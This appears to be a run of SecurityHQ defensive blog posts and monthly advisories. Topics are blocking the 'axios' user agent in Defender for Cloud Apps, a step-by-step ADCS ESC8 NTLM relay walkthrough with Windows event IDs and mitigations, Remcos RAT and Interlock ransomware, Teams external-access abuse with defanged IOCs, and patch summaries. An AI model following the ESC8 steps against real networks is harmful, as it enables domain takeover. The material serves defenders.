This policy inspects live sessions and blocks any that match certain criteria — in this case, when the User-Agent string contains “axios”.

1. In MDCA Portal → Control → Access policies → + Create policy

1. Configure the following settings:

Click Create

This will block any Axios-based request to Office 365 apps.

Blocking malicious user agents is just one layer of a broader adaptive defense strategy. As attackers evolve, organizations must go beyond detection and adopt real-time controls that secure sessions, user identities, and cloud interactions.

Learn how to take your security strategy further with SecurityHQ’s Adaptive Defense Solutions, built to identify, contain, and respond to threats at every stage of the attack lifecycle.

The post Adaptive Defense: How Cloud App Policies Can Block Malicious User Agents appeared first on SecurityHQ.

However, when misconfigured, ADCS can open doors for attackers to exploit weaknesses, leading to unauthorized access and privilege escalation.

How Can ADCS Become Vulnerable?

Unlike traditional threats, ADCS exploitation often begins with misconfigured certificate templates or weak HTTP-based enrollment methods. Once these are exploited, attackers can move laterally across the network, compromising critical systems and sensitive data.

Initially, the process begins with the client (user or computer) generating a public/private key pair. The client then sends a Certificate Signing Request (CSR) to the Certificate Authority (CA) server, which includes the public key and requested certificate details. The CA validates the request by checking if the certificate template settings permit the request, whether the certificate already exists, and if the client has the necessary permissions to enroll.

Figure 1: ADCS Client-to-Server Workflow, SecurityHQ

Upon successful validation, the CA uses its private key to sign and issue the certificate. The client stores the issued certificate in its Windows Certificate Store, enabling it to perform actions such as authentication, code signing, or secure communication as allowed by the certificate’s intended purpose.

Exploiting ESC8 – NTLM Relay Attack via AD CS Web Enrollment

Before exploring the exploitation of ESC8 (NTLM Relay Attack through AD CS Web Enrollment), it is important to understand how NTLM relay attacks work. NTLM relaying is a common attack used by threat actors to steal identities.

It works in two steps. First, it forces a victim to authenticate to a targeted endpoint. Second, it relays the authentication against a vulnerable target. By relaying the victim’s login details, attackers can log in and act as the victim. This helps them gain access to systems and potentially take over the network.

Figure 2: NTLM Relay Attack Flow, SecurityHQ

Active Directory Certificate Services (ADCS) provide an HTTP-based method for users and machines to enroll for certificates. When HTTP web enrollment is enabled, these methods are vulnerable and are often exploited through NTLM relay attacks. In such attacks, attackers impersonate authenticated users by relaying legitimate authentication requests to request certificates. This vulnerability can lead to full domain compromise.

The widespread use of HTTP-based enrollment further increases the risk of exploitation. Security researchers refer to this specific vulnerability or misconfiguration in ADCS as ADCS ESC8.

How Can ADCS ESC8 be Exploited in 6 Steps?

In this instance, the attacker first needs to enumerate the ADCS(HTTP) endpoint in the network which can be enumerated by tools such as certipy (python-based tool). Note that the attacker would need access to the domain, but the credential of a simple low-level authenticated user is all that is needed to perform the attack.

Figure 3: ESC8 (NTLM Relay Attack via ADCS Web Enrollment), SecurityHQ

1. Once the vulnerable endpoint (ADS01) is identified, actors use an NTLM coercion method to initiate NTLM authentication from a domain controller. Event Detection Point: Look for Windows Event ID 4776 where you will be able to see the login event performed for the domain controller account (i.e. DC01$) where $ indicates the authentication is initiated for the system account of DC from the victim’s machine.
2. The domain controller responds with the NTLM authentication which is relayed by the attacker from the victim’s machine to the vulnerable AD CS machine. This is achieved by setting up a relay on the attacker machine through tools such as ntlmrelayx.
3. The URL “http://<Vulnerable_CA_Server>/certsrv/certfnsh.asp” is Microsoft’s Certificate Services web interface, which is used for certificate enrollment. The “certfnsh.asp” page is responsible for completing the certificate request process and delivering the issued certificate to the requestor. Event Detection Point: Look for network traffic on port 80 directed toward the ADCS server. Specifically, you will observe a GET method here.
4. The attacker requests a certificate for a domain controller, as it was a relayed request impersonating a legitimate source, ADCS issues a certificate for the requested domain controller (i.e. DC01.pfx). This obtained certificate will be stored in the Windows stores. Event Detection Point: Look for Windows Event ID 4886, which is generated when certificates are requested, and Windows Event ID 4887, which indicates that Certificate Services has approved a certificate request and issued a certificate to the requester.
5. Using the generated certificate attackers can impersonate the domain controller machine account and request a Kerberos TGT to authenticate the Domain controller. Event Detection Point: Windows Event ID 4768 will show the Kerberos authentication login event for the domain controller account (e.g., DC01$) &. Look for network traffic on port 80 directed toward the ADCS server. Specifically, you will observe the POST method here.
6. Once these TGTs are received the attackers now can authenticate as the domain controller anywhere in the domain as they have NT Hash for the Domain controller machine account, further performing a DC Sync attack to retrieve all the domain hashes. Event Detection Point: Look for Windows Event ID 4662 for an indication of a DC Sync Attack.

Detect ADCS Abuse

To detect ADCS abuse, Windows Events ID needs to be monitored. These include:

• Event ID 4776: The domain controller attempted to validate the credentials for an account. This event can be a valuable indicator for detecting Pass-the-Hash, as it is logged whenever a domain controller (DC) attempts to validate the credentials of an account using NTLM over Kerberos.
• Event ID 4886: Certificate Services received a certificate request. Monitor this event ID for certificate issues for the domain controller.
• Event ID 4887: Certificate Services approved a certificate request and issued a certificate. Monitor this event ID for ADCS issuing a certificate to the requestor.
• Event ID 4768: A Kerberos authentication ticket (TGT) was requested. Monitor this event for a user or computer account that is attempting to authenticate to the domain and obtain access to resources.
• Event ID 4662: An operation was performed on an object. Monitor this event ID for DC Sync Attack which allows attackers to steal credentials by using DSGetNC Changes requests.

Mitigations and Next Steps

1. Disable NTLM Authentication on your Windows domain controller and on any AD CS Servers in your domain.
2. Disable HTTP on AD CS servers. (AD CS Web Enrollment)
3. Enable Extended Protection for Authentication (EPA)
4. Enable detailed logging of certificate requests and enrolments on the CA Server.

For more information about this vulnerability, how it works, and how to protect against it, contact an expert, here.

The post Security Abuse of Misconfigured Active Directory Certificate Services Continue appeared first on SecurityHQ.

Two New Variants of Remcos RAT Identified in Recent Malware Campaigns

Threat Reference: Global

Risks: Malware

Advisory Type: Threats

Priority: Standard

The Remcos Remote Access Trojan (RAT) is a growing cybersecurity threat that primarily spreads through the use of phishing emails containing malicious attachments. Two new variants of the RAT have recently been uncovered. One variant is seen using VBS files to trigger hidden PowerShell scripts to download and execute malicious files. The second variant uses malicious attachments to exploit older vulnerabilities (CVE-2017-11882) in Microsoft Office to install the RAT.

Attack Scenario, Variant 1

1. The VBS file triggers an obfuscated PowerShell script on the victim’s system, which downloads malicious files (e.g., DLL01.txt, Entry.txt) from a command-and-control (C2) server via FTP server or Google Drive.

2. The PowerShell script checks the installed version, and once downloaded, the files are decoded, and the malicious payload is executed. The payload is injected into a legitimate system process, RegAsm.exe, a Microsoft .NET executable file.

3. The Remcos keylogger payload is loaded into memory, and the keylogger monitors the victim’s activity by logging all keystrokes.

4. The malware creates a registry entry under HKCU (HKEY_CURRENT_USER) Run for persistence and a misleading directory in AppData/Local/Microsoft\LocalLow to hide the malicious files from detection.

5. The Captured data, including keystrokes, is stored in %ProgramData%\1210\logs.dat and exfiltrated to the C2 server. The malware maintains continuous communication with the C2 server, which can deliver payloads, receive stolen data, or issue commands to control the system.

Attack Scenario, Variant 2

1. This variant is delivered through a spam email with a malicious Office Open XML Document (.docx) file.

2. The document is an RTF file with a long filename, designed to trick the victim into opening it.

3. The document contains a reference to an external URL, which downloads an RTF file exploiting the CVE-2017-11882 vulnerability in Microsoft Equation Editor, allowing remote code execution.

4. The RTF file downloads a highly obfuscated VBS script. The payload includes a .NET DLL (dnlib.dll), which is loaded into memory via PowerShell without writing to disk to evade detection. After that, the Remcos RAT follows the usual malicious activities.

Indicators of compromise (IOCs). Domains/URLs:

• dealc[.]me/NLizza
• raw[.]githubusercontent[.]com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V[.]txt
• 91[.]134[.]96[.]177/70/RGGFVC[.]txt
• 91[.]134[.]96[.]177/70/picturewithmegetbacktouse[.]tIF

Recommendations

1. Implement Multi-Factor Authentication to significantly reduce the risk of successful login attempts using stolen credentials.
2. Deploy Endpoint Detection and Response (EDR) solutions to help identify and respond to suspicious activity, potentially stopping ransomware deployment.
3. Regular data backups stored securely offline are essential for recovery in case of a ransomware attack.
4. Prioritize and apply security patches promptly to address vulnerabilities that attackers can exploit.
5. Educate employees to identify phishing attempts and other social engineering tactics used to gain initial access.
6. Regular Security Assessments Conduct regular security assessments to identify and address potential weaknesses in your IT infrastructure.

71 Vulnerabilities, Including 30 Remote Code Execution Flaws in Microsoft’s Dec Patch Tuesday

Threat Reference: Global

Risks: Remote Code Execution, Privilege Escalation, Security Feature Bypass, Information Disclosure, Denial of Service, and Spoofing

Advisory Type: Updates/Patches

Priority: Standard

Microsoft has released its Patch Tuesday for December 2024, addressing 71 security vulnerabilities, including one zero-day and 30 remote code execution vulnerabilities.

Successful exploitation of these vulnerabilities could lead to remote code execution, privilege escalation, security feature bypass, information disclosure, denial of service, and spoofing.

Affected products include Microsoft Office, Microsoft Edge, Microsoft Defender for Endpoint, Microsoft Office SharePoint, Microsoft Office Word, Windows Task Scheduler, Windows Resilient File System (ReFS), and GitHub.

Notable CVEs Include:

• [Zero-Day] – CVE-2024-49138 – Windows Common Log File System Driver Elevation of Privilege Vulnerability
• [Critical] – CVE-2024-49115 – Windows Remote Desktop Services Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49116 – Windows Remote Desktop Services Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49117 – Windows Hyper-V Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49118 – Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49119 – Windows Remote Desktop Services Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49120 – Windows Remote Desktop Services Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49122 – Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49123 – Windows Remote Desktop Services Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49124 – Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49126 – Windows Local Security Authority Subsystem Service (LSASS) Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49127 – Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49128 – Windows Remote Desktop Services Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49132 – Windows Remote Desktop Services Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49106 – Windows Remote Desktop Services Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49108 – Windows Remote Desktop Services Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49112 – Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability

View the full list, here.

Recommendations

Update all affected products to the latest available patch version.

SecurityHQ Recommendation for Microsoft Default Teams External Access Hardening – Addendum

Threat Reference: Global

Risks: Threats

Advisory Type: Phishing, Spoofing, Ransomware

Priority: Standard

While this advisory revisits insights shared in November 2024, it reflects new campaign developments observed since October 2024, necessitating immediate review and enhancement of security settings.

SecurityHQ has observed a resurgence in targeted social engineering attacks exploiting Microsoft Teams’ external access settings. Threat actors such as Storm-1811 and Black Basta are leveraging these settings to initiate contact with victims, using display names like “Help Desk Manager” or impersonating internal IT staff. After gaining the victim’s trust, attackers manipulate them into downloading remote desktop tools such as AnyDesk, Quick Assist, or TeamViewer, enabling unauthorized system access and further malicious activity.

By default, Microsoft Teams allows external users to initiate chats and share files with corporate accounts. This configuration is exploited by these actors to execute sophisticated attacks.

Key Threat Actor Tactics

• Storm-1811

1. Initial Contact: Floods the victim’s inboxes with spam (email bombing) to create urgency.

2. Impersonation: Poses as an IT administrator via Microsoft Teams or phone calls.

3. Exploitation: Guides users to install RMM tools and establishes SSH tunnel backdoors for persistence and reconnaissance.

• Black Basta

1. Initial Contact: Overloads inboxes with spam and follows up via Teams, impersonating IT staff.

2. Credential Harvesting: Deploys obfuscated malware (e.g., Zbot, DarkGate) and custom harvesters for rapid credential theft.

3. Payload Delivery: Uses compromised cloud services or direct uploads to deploy ransomware payloads.

Risk and Exploits

While Microsoft Teams requires users to accept chat requests before viewing messages from external accounts, this safeguard is easily bypassed through spoofed corporate accounts, urgent scenarios, and trusted source impersonation.

The SecurityHQ team has also added recently observed Indicators of Compromise (IOCs) related to the Abuse of Teams External Access Feature in an internal investigation.

Indicators of compromise (IOCs). IP Addresses:

• 185[.]130[.]47[.]96
• 65[.]87[.]7[.]151
• 66[.]78[.]40[.]86
• 184[.]174[.]97[.]32
• 212[.]232[.]22[.]140
• 8[.]209[.]111[.]227
• 8[.]211[.]34[.]166
• 109[.]172[.]88[.]38
• 109[.]172[.]87[.]135
• 188[.]130[.]206[.]243
• 46[.]8[.]232[.]106
• 46[.]8[.]236[.]61
• 91[.]212[.]166[.]91
• 93[.]185[.]159[.]253
• 94[.]103[.]85[.]114
• 193[.]29[.]13[.]60
• 88[.]214[.]25[.]32
• 147[.]28[.]163[.]206
• 45[.]61[.]152[.]154
• 185[.]229[.]66[.]224
• 172[.]81[.]60[.]122
• 145[.]223[.]116[.]66
• 185[.]238[.]169[.]17
• 179[.]60[.]149[.]194
• 178[.]236.247[.]173
• 38[.]180.192[.]243
• 45[.]8.157[.]162
• 45.8[.]157.158
• 178.236[.]247.173
• 195[.]123.233[.]148
• 89[.]185.80[.]170
• 195.211[.]96.135

Domains/URLs:

• youadmin.onmicrosoft[.]com
• delparqueflats[.]com
• bilipow.onmicrosoft[.]com
• brandonsupport.onmicrosoft[.]com
• cofincafe[.]com
• cybersecurityadmin.onmicrosoft[.]com
• cybershieldassist.onmicrosoft[.]com
• databreachsupport.onmicrosoft[.]com
• endpointshield.onmicrosoft[.]com
• eps.udg.edu
• filtrocorp[.]com
• helpadministrator.onmicrosoft[.]com
• itsecurityassistance.onmicrosoft[.]com
• itusaacademy[.]com
• malwareremovalassistance.onmicrosoft[.]com
• networksecuritymonitoring.onmicrosoft[.]com
• pereirabrito[.]com.br
• safesoc.onmicrosoft[.]com
• securitypatching.onmicrosoft[.]com
• servicedeskadmin.onmicrosoft[.]com
• spamprotectionmanager.onmicrosoft[.]com
• spamprotections.onmicrosoft[.]com
• supporthelper.onmicrosoft[.]com
• supporthelpspam.onmicrosoft[.]com
• supportteamsservice.onmicrosoft[.]com
• llladminllll.onmicrosoft[.]com
• hegss.onmicrosoft[.]com
• llladminhlpll.onmicrosoft[.]com
• 1helpyou.onmicrosoft[.]com
• truehalp.onmicrosoft[.]com
• adminsteams.onmicrosoft[.]com
• asssistingyou.onmicrosoft[.]com
• suporting.onmicrosoft[.]com
• hprsynergyengineering.onmicrosoft[.]com
• bevananda[.]com
• sslip[.]io
• *.doc[.]docu-duplicator[.]com
• *.doc1[.]docu-duplicator[.]com
• *.doc2[.]docu-duplicator[.]com
• dns[.]winsdesignater[.]com
• crystallakehotels[.]com
• summerrain[.]cloud
• mailh[.]org
• file[.]io
• bigdealcenter[.]world
• brownswer[.]com
• blazingradiancesolar[.]com
• posetoposeschool[.]com
• arifgrouporg-my[.]sharepoint[.]com
• binusianorg-my[.]sharepoint[.]com
• dropmeafile[.]com

Recommendations

Kindly check if your current team’s external access settings allow external users to initiate chat messages. It is highly recommended to restrict access to external users.

Step 1: Log in to the Microsoft Teams admin center.

Step 2: Go to the external access setting and scroll down.

Step 3: Unchecked to People In my org can communicate with Teams users whose accounts aren’t managed by an organization.

Step 4: Click on save and confirm the changes.

Once you are done with changes, it will take some time to reflect changes

Ivanti Patched Multiple Critical and High-Severity Vulnerabilities

Threat Reference: Global

Risks: Arbitrary File Deletion, Unauthorized access, Remote code execution, Denial of Service

Advisory Type: Updates/Patches

Priority: Standard

SecurityHQ has observed that Ivanti has released multiple high and critical severity vulnerabilities affecting multiple Ivanti Products. Successful exploitation of these vulnerabilities may allow an attacker to perform Arbitrary File Deletion, Unauthorized access, Remote code execution, and Denial of Service (DOS) attacks.

Affected Products include Ivanti Cloud Services Application (CSA), Ivanti Desktop and Server Management (DSM), Ivanti Policy Secure (IPS), Ivanti Connect Secure (ICS), Ivanti Sentry, Ivanti Endpoint Manager, Ivanti Security Controls, Ivanti Patch for Configuration Manager, Ivanti Neurons for Patch Management, and Ivanti Neurons Agent Platform.

Notable CVE’s:

• [Critical] CVE-2024-11633- Argument injection in Ivanti Connect Secure before version 22.7R2.4 allows a remote authenticated attacker with admin privileges to achieve remote code execution
• [Critical] CVE-2024-11634- Command injection in Ivanti Connect Secure before version 22.7R2.3 and Ivanti Policy Secure before version 22.7R1.2 allows a remote authenticated attacker with admin privileges to achieve remote code execution.
• [Critical] CVE-2024-11639 – An authentication bypass in the admin web console of Ivanti CSA before 5.0.3 allows a remote unauthenticated attacker to gain administrative access
• [Critical] CVE-2024-11772 – Command injection in the admin web console of Ivanti CSA before version 5.0.3 allows a remote authenticated attacker with admin privileges to achieve remote code execution.
• [Critical] CVE-2024-11773 – SQL injection in the admin web console of Ivanti CSA before version 5.0.3 allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements.

SecurityHQ was not able to identify any evidence of these vulnerabilities being exploited in the wild nor any association with the Advanced Persistent Threat (APT) group or malware variant.  

Recommendation

Update all the affected products to the latest available patch version.

Adobe Released Security Updates to Address 161 Security Vulnerabilities Across Products with Critical and Important Severity.

Threat Reference: Global

Risks: Cross-site Scripting (XSS), Stack-Bases, Heap-based Buffer Overflow and Improper Input Validation.

Advisory Type: Updates/Patches

Priority: Standard

Adobe has released its Patches, addressing a total 161 of new security vulnerabilities across multiple Adobe Products. Out of which 45 are critical vulnerabilities and 116 are important vulnerabilities. These updates aim to mitigate vulnerabilities that could allow attackers to attempt Cross-site Scripting (XSS), stack bases, Heap-based Buffer overflow, and Improper input validation.

Affected Products include Adobe Experience Manager (AEM), Acrobat DC, Acrobat Reader DC, Acrobat 2024, Acrobat 2020, Acrobat Reader 2020, Adobe Media Encoder, Adobe After Effects, Adobe Animate 2023, Adobe Animate 2024, Adobe InDesign, Adobe PDFL Software Development Kit (SDK), Adobe Connect, Adobe Substance 3D Sampler, Photoshop 2025, Adobe Bridge, Adobe Premiere Pro, Adobe Substance 3D Painter, and Adobe FrameMaker.

Recommendation

Update all the affected products to the latest available patch version.

Threat Intelligence for the Future

SecurityHQ’s Threat Intelligence team is a cohesive global unit dedicated to Cyber Threat Intelligence. Our team is focused on researching emerging threats and tracking activities of threat actors, ransomware groups, and campaigns, to ensure that they stay ahead of potential risks. Beyond their investigative work, the Intelligence team provides actionable threat intelligence and research, enriching the understanding of SecurityHQ’s customers worldwide. United by a common commitment, the SecurityHQ Threat Intelligence team delivers the insights needed to confidently navigate the intricacies of the cyber security threat landscape.

For more information on these threats, speak to an expert here. Or if you suspect a security incident, you can report an incident here.

The post December 2024 Threat Advisory – Top 5 appeared first on SecurityHQ.

The Emergence of Interlock Ransomware

Threat Reference: Global

Risks: Ransomware

Advisory Type: Threats

Priority: Standard

SecurityHQ has identified the emergence of a new ransomware strain, Interlock. This ransomware targets Windows systems and is known for its stealthy operations and methodical approach to encrypting files. After gaining initial access through phishing emails containing malicious links, Interlock utilizes ransom notes that threaten to expose sensitive information unless a ransom is paid. The malware then encrypts files and appends specific file extensions to indicate encryption, whilst employing a sophisticated blend of evasion techniques to avoid detection.

Interlock ransomware is believed to have originated from a Russian-speaking cybercrime group. The attack vectors and deployment methods indicate that the threat actors behind Interlock are experienced and familiar with various ransomware distribution strategies. While the precise origins and initial release timeline remain unclear, the ransomware has been observed spreading in targeted campaigns against high-value organizations.

Affected Products include Windows operating systems, Microsoft Office documents, databases, image formats, financial institutions, healthcare organizations, and Government entities.

Recommendations:

SecurityHQ has identified several measures to reduce risk such as implementing Multi-Factor Authentication, deploying Endpoint Detection and Response solutions, regular data backups, addressing vulnerabilities, educating employees, and regular security assessments.

Adobe Released Security Updates to Patch Multiple Critical and Important Severity Vulnerabilities across Adobe Products

Threat Reference: Global

Risks: Arbitrary Code Execution, Memory Leak, Application Denial-of-Service

Advisory Type: Updates/Patches

Priority: Standard

Adobe has released security updates to fix multiple critical severity vulnerabilities across its products. Successful exploitation of these vulnerabilities poses the risk of Memory Leak, Arbitrary Code Execution, and Application denial-of-service.

Affected products include Adobe After Effects, Adobe Substance 3D Painter, Adobe Illustrator, Adobe InDesign, Adobe Photoshop, and Adobe Commerce.

Notable CVEs:

• [Critical] CVE-2024-47441- Out-of-bounds Write – Software error that can occur when reading data from memory. These errors can lead to crashes or other unexpected vulnerabilities, that may allow an attack to read sensitive information.

• [Critical] CVE-2024-49521- Server-Side Request Forgery (SSRF) – A web security vulnerability that allows an attacker to cause an application to make requests to an unintended application.

• [Critical] CVE-2024-49525- Heap-based Buffer Overflow – Buffer Overflows are particularly vulnerable to threat actors attempting to corrupt data and disrupt operations.

Recommendations:

Update all affected products to the latest available patch version.

Joint Agency Advisory: Increased Threat of Zero-Day Exploits Targeting Enterprise Vulnerabilities

Threat Reference: Global

Risks: Code Injection, Privilege Escalation, Heap-Based Buffer Overflow, SQL Injection, Remote Code Execution

Advisory Type: Updates/Patches

Priority: Standard

In a joint advisory published by NCSC, CISA, and allied agencies, experts warn of a surge in cyber attackers, including state-sponsored and financially motivated groups, exploiting zero-day vulnerabilities. Both newly disclosed and known vulnerabilities are being rapidly weaponized, making unpatched systems particularly vulnerable.

Agencies note a shift toward swift exploitation tactics and are advising organizations to bolster defenses by promptly patching and reducing their attack surfaces. Key industries such as government, finance, and critical infrastructure are primary targets.

Notable CVEs

• CVE-2021-44228 (“Log4Shell”): RCE in Apache Log4j, highly exploited – Attackers submit requests causing systems to execute arbitrary code allowing them to take full control of the system, steal information, launch ransomware, and more.
  
  
• CVE-2019-0708 (“BlueKeep”): RCE in Windows RDP, critical impact – security vulnerability discovered in Windows operating systems that allows for the possibility of remote code execution – allowing attackers full control over systems.
  
  
• CVE-2020-1472 (“Zerologon”): Domain admin access in Microsoft Netlogon. – Attackers gain access to systems via brute-force-attack against Netlogon exploiting a flaw in the system in which 1 in every 256 codes yields a ciphertext of only zeros.

Visit here for the full list.

Recommendations:

Update all the affected products to the latest available patch version.

Microsoft Released its November 2024 Patch Tuesday for 91 Flaws Including 04 Zero-Days and 52 Remote Code Execution Vulnerabilities

Threat Reference: Global

Risks: Remote Code Execution, Elevation of Privilege, Security Feature Bypass, Information Disclosure, Denial of Service and Spoofing

Advisory Type: Updates/Patches

Priority: Standard

Microsoft has released its Patch Tuesday for November 2024, with security updates for 91 flaws, including 04 actively exploited and 52 Remote Code Execution Vulnerabilities. Successful exploitation of these vulnerabilities could result in Elevation of Privilege, Security Feature Bypass, Remote Code Execution, Information Disclosure, Denial of Service, and Spoofing.

Affected Products include .NET and Visual Studio, Airlift.microsoft.com, Azure CycleCloud, LightGBM, Microsoft Defender for Endpoint, Microsoft Edge (Chromium-based), Microsoft Exchange Server, Microsoft Graphics Component, Microsoft Office Excel, Microsoft Office Word, Microsoft PC Manager, Microsoft Virtual Hard Drive, Microsoft Windows DNS, Role: Windows Active Directory Certificate Services, Role: Windows Hyper-V, SQL Server, TorchGeo, Visual Studio, Visual Studio Code, Windows CSC Service, Windows Defender Application Control (WDAC), Windows DWM Core library, Windows Kerberos, Windows Kernel, Windows NT OS Kernel, Windows NTLM, Windows Package Library Manager, Windows Registry, Windows Secure Kernel Mode, Windows SMB, Windows SMBv3 Client/Server, Windows Task Scheduler, Windows Telephony Service, Windows Update Stack, Windows USB Video Driver, Windows VMSwitch, and Windows Win32 Kernel Subsystem.

Notable CVEs:

• [Zero-Day] – [Important] – CVE-2024-43451 – NTLM Hash Disclosure Spoofing Vulnerability – Enables an attacker to authenticate as a user after only minimal interaction, such as opening a malicious file.

• [Critical] – CVE-2024-43498 – .NET and Visual Studio Remote Code Execution Vulnerability – attackers able to exploit vulnerabilities by sending crafted requests to .NET vulnerable webapp, or loading a specifically crafted file into the application.

• [Critical] – CVE-2024-43639 – Windows Kerberos Remote Code Execution Vulnerability – Critical vulnerability that allows attackers to send crafted requests to vulnerable systems to gain unauthorized access and execute arbitrary code on affected systems.

Recommendations:

Update all affected products to the latest available patch version.

Fortinet Patches Critical Vulnerabilities

Threat Reference: Global

Risks: Privilege Escalation, Arbitrary Code Execution and Unauthorized Session Hijacking

Advisory Type: Updates/Patches

Priority: Standard

Fortinet has released patches to address high-severity vulnerabilities affecting its products. Successful exploitation of these vulnerabilities could result in Privilege Escalation, Arbitrary Code Execution, and Unauthorized Session Hijacking.

Affected products include FortiClientWindows, FortiAnalyzer, FortiAnalyzer-BigData, FortiManager, FortiManager Cloud, FortiOS

Notable CVEs:

• [Critical] – CVE-2024-47575 – A missing authentication vulnerability in the FortiManager daemon may permit a remote, unauthenticated attacker to execute arbitrary code or commands through crafted requests.

• [High] – CVE-2024-36513 – A privilege context switching error vulnerability in FortiClient for Windows may enable an authenticated user to gain elevated privileges by exploiting Lua auto-patch scripts.

• [High] – CVE-2024-23666 – A client-side implementation of a server-side security vulnerability in FortiAnalyzer could allow an authenticated attacker with read-only access to carry out sensitive operations through crafted requests.

Recommendations:

Update all affected products to the latest available patch version.

Threat Intelligence for the Future

SecurityHQ’s Threat Intelligence team is a cohesive global unit dedicated to Cyber Threat

Intelligence. Our team is focused on researching emerging threats and tracking activities of threat actors, ransomware groups, and campaigns, to ensure that they stay ahead of potential risks. Beyond their investigative work, the Intelligence team provides actionable threat intelligence and research, enriching the understanding of SecurityHQ’s customers worldwide. United by a common commitment, the SecurityHQ Threat Intelligence team delivers the insights needed to confidently navigate the intricacies of the cyber security threat landscape.

For more information on these threats, speak to an expert here. Or if you suspect a security incident, you can report an incident here.

The post November 2024 Threat Advisory – Top 5 appeared first on SecurityHQ.